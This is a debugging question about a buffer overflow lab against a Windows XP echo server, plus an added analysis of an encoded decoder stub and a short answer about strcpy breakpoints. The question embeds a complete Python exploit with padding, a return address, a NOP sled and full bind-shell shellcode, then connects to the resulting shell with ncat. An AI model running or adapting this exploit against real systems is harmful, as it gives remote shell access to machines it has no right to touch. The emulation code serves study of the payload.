
assembly : where to find the shellcode of a buffer overflow exploit

On a windows xp machine, I open an "echo server" exe with Immunity Debugger, then run the program. The echo server is running on port 10000.

On my other machine, I run a python script (see below) that does a buffer overflow exploit, with a "windows/shell_bind_tcp" payload. The exploit works fine, that's not the question.

After I run the script, with python strcpy.py 192.168.1.123, I don't see anything moving in Immunity Debugger. But I found this in the dump :

0022FB84  D9 CA D9 74 24 F4 58 31  ÙÊÙt$ôX1
0022FB8C  C9 B1 53 BA 9B B3 0A 02  ɱSº›³.
0022FB94  31 50 17 03 50 17 83 C0  1PPƒÀ
0022FB9C  04 E2 F5 FC E8 82 00 00  âõüè‚..
0022FBA4  00 60 89 E5 31 C0 64 8B  .`‰å1Àd‹

Only from "D9" to "50 17 83" is it the same as the shellcode below. Is it because what I see is the EXECUTED shellcode (instead of the original)?

Then, on a separate terminal, I leverage the exploit by connecting to the remote machine : ncat 192.168.1.123 4444

Now, even though I'm connecting to port 4444 (not 10000), I suddenly see things move inside Immunity Debugger. Is this because the executed shellcode's memory resides inside the echo server program?

Is it possible to find the complete original shellcode inside Immunity Debugger (starting with '\xd9\xca\xd9\x74', see script below)? Of course, if the shellcode contains bad characters (like '\x00'), I can easily find the full shellcode up to the bad character.

strcpy.py :

#!/usr/bin/env python
# Python 2 script: str literals are byte strings, so the buffer below is sent as raw bytes
import socket, sys
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #address family, tcp socket
sock.connect((sys.argv[1], 10000))

buffer = "A"*268
buffer += "\x7E\x6E\xEF\x77"
buffer += "\x90"*20
buffer +=("\xd9\xca\xd9\x74\x24\xf4\x58\x31\xc9\xb1\x53\xba\x9b\xb3\x0a"
"\x02\x31\x50\x17\x03\x50\x17\x83\x5b\xb7\xe8\xf7\xa7\x50\x6e"
"\xf7\x57\xa1\x0f\x71\xb2\x90\x0f\xe5\xb7\x83\xbf\x6d\x95\x2f"
"\x4b\x23\x0d\xbb\x39\xec\x22\x0c\xf7\xca\x0d\x8d\xa4\x2f\x0c"
"\x0d\xb7\x63\xee\x2c\x78\x76\xef\x69\x65\x7b\xbd\x22\xe1\x2e"
"\x51\x46\xbf\xf2\xda\x14\x51\x73\x3f\xec\x50\x52\xee\x66\x0b"
"\x74\x11\xaa\x27\x3d\x09\xaf\x02\xf7\xa2\x1b\xf8\x06\x62\x52"
"\x01\xa4\x4b\x5a\xf0\xb4\x8c\x5d\xeb\xc2\xe4\x9d\x96\xd4\x33"
"\xdf\x4c\x50\xa7\x47\x06\xc2\x03\x79\xcb\x95\xc0\x75\xa0\xd2"
"\x8e\x99\x37\x36\xa5\xa6\xbc\xb9\x69\x2f\x86\x9d\xad\x6b\x5c"
"\xbf\xf4\xd1\x33\xc0\xe6\xb9\xec\x64\x6d\x57\xf8\x14\x2c\x30"
"\xcd\x14\xce\xc0\x59\x2e\xbd\xf2\xc6\x84\x29\xbf\x8f\x02\xae"
"\xc0\xa5\xf3\x20\x3f\x46\x04\x69\x84\x12\x54\x01\x2d\x1b\x3f"
"\xd1\xd2\xce\xaa\xd9\x75\xa1\xc8\x24\xc5\x11\x4d\x86\xae\x7b"
"\x42\xf9\xcf\x83\x88\x92\x78\x7e\x33\x8d\x24\xf7\xd5\xc7\xc4"
"\x51\x4d\x7f\x27\x86\x46\x18\x58\xec\xfe\x8e\x11\xe6\x39\xb1"
"\xa1\x2c\x6e\x25\x2a\x23\xaa\x54\x2d\x6e\x9a\x01\xba\xe4\x4b"
"\x60\x5a\xf8\x41\x12\xff\x6b\x0e\xe2\x76\x90\x99\xb5\xdf\x66"
"\xd0\x53\xf2\xd1\x4a\x41\x0f\x87\xb5\xc1\xd4\x74\x3b\xc8\x99"
"\xc1\x1f\xda\x67\xc9\x1b\x8e\x37\x9c\xf5\x78\xfe\x76\xb4\xd2"
"\xa8\x25\x1e\xb2\x2d\x06\xa1\xc4\x31\x43\x57\x28\x83\x3a\x2e"
"\x57\x2c\xab\xa6\x20\x50\x4b\x48\xfb\xd0\x7b\x03\xa1\x71\x14"
"\xca\x30\xc0\x79\xed\xef\x07\x84\x6e\x05\xf8\x73\x6e\x6c\xfd"
"\x38\x28\x9d\x8f\x51\xdd\xa1\x3c\x51\xf4")

sock.send(buffer)
print sock.recv(1024)
sock.close()
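An added worked example (not part of the original question or answer) that explains the dump above: the posted payload starts with a self-decoding stub, and the bytes seen in memory after "50 17 83" are the stub's decoded output, not the bytes that were sent. Identifying the stub as a Metasploit "shikata ga nai" style xor-additive-feedback loop is my inference from its opcodes; the question does not name the encoder. The script below embeds only the first 43 bytes of the posted payload (stub plus five encoded dwords) and the 40 bytes of the posted dump, both copied from the question, and emulates the loop statically, which is how an analyst recovers what a debugger would show without running the sample.

```python
# Added example, not from the original post. Static emulation of the decoder stub at the
# front of the posted payload. Hand disassembly of the first 27 bytes (an assumption drawn
# from the opcodes; the encoder is not named on the page):
#
#   D9 CA            fxch st(2)          ; any FPU instruction: its address is recorded in the FPU env
#   D9 74 24 F4      fnstenv [esp-0xc]   ; saved FIP (the fxch address) lands at [esp]
#   58               pop eax             ; eax = address of "D9 CA" = start of the payload
#   31 C9            xor ecx, ecx
#   B1 53            mov cl, 0x53        ; 83 dwords to decode
#   BA 9B B3 0A 02   mov edx, 0x020AB39B ; initial key
#   31 50 17         xor [eax+0x17], edx ; decode one dword in place, starting at offset 23
#   03 50 17         add edx, [eax+0x17] ; key feedback: next key = key + decoded dword
#   83 C0 04         add eax, 4
#   E2 F5            loop (back to the xor)
#
# Offset 23 is inside the stub's own tail ("C0 04 E2 F5" = add eax,4 / loop), so the very
# first xor rewrites the decoder itself. That is why the wire bytes and the memory dump
# agree only up to "50 17 83" (offsets 0..22) and differ from offset 23 on.

import struct

# First 43 bytes of the payload exactly as it appears in strcpy.py (stub + 5 encoded dwords).
ENCODED_HEAD = bytes.fromhex(
    "d9cad97424f45831c9b153ba9bb30a"
    "02315017035017835bb7e8f7a7506e"
    "f757a10f71b2900fe5b783bf6d"
)

# The 40 bytes of the Immunity dump quoted in the question (0022FB84 .. 0022FBAB).
DUMP = bytes.fromhex(
    "d9cad97424f45831" "c9b153ba9bb30a02" "315017035017" "83c0"
    "04e2f5fce8820000" "006089e531c0648b"
)


def decode_in_place(wire):
    """Emulate the decoder loop over `wire` (the bytes as sent) and return the memory
    image as it looks after the loop has run, i.e. what the debugger dump shows.
    Only as many complete dwords as the buffer actually contains are decoded, so a
    truncated capture like ENCODED_HEAD is handled instead of raising."""
    mem = bytearray(wire)
    count = mem[10]                                  # operand of "mov cl, imm8"
    key = struct.unpack_from("<I", mem, 12)[0]       # operand of "mov edx, imm32"
    off = mem[18]                                    # disp8 of "xor [eax+disp8], edx"
    available = (len(mem) - off) // 4                # dwords present in this capture
    eax = 0                                          # offsets relative to the payload start
    edx = key
    for _ in range(min(count, available)):
        pos = eax + off
        enc = struct.unpack_from("<I", mem, pos)[0]
        dec = enc ^ edx                              # xor [eax+off], edx
        struct.pack_into("<I", mem, pos, dec)
        edx = (edx + dec) & 0xFFFFFFFF               # add edx, [eax+off]
        eax += 4                                     # add eax, 4
    return bytes(mem)


def first_divergence(wire, mem):
    """Index of the first byte where the sent bytes and the memory image differ."""
    for i, (a, b) in enumerate(zip(wire, mem)):
        if a != b:
            return i
    return None


def matches_dump():
    """True if the emulated memory image reproduces the dump quoted in the question."""
    return decode_in_place(ENCODED_HEAD)[: len(DUMP)] == DUMP


if __name__ == "__main__":
    mem = decode_in_place(ENCODED_HEAD)
    print("wire :", ENCODED_HEAD.hex(" "))
    print("mem  :", mem.hex(" "))
    print("first differing offset:", first_divergence(ENCODED_HEAD, mem))
    print("matches posted dump:", matches_dump())
```

The decoded tail "FC E8 82 00 00 00 60 89 E5 31 C0 64 8B 50 30" is the usual cld / call / pushad / mov ebp,esp / xor eax,eax / mov edx,fs:[eax+0x30] prologue that Metasploit x86 Windows payloads start with, which is consistent with the windows/shell_bind_tcp payload named in the question. For the same reason, the "complete original" encoded bytes cannot be found in process memory once the stub has run: only the first 23 bytes are ever present unchanged, and searching for the sent bytes beyond that will match at most up to the first decoded dword.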

Set a breakpoint on the strcpy call and inspect the destination buffer after strcpy returns. If there are more strcpy calls, follow the flow after recv.
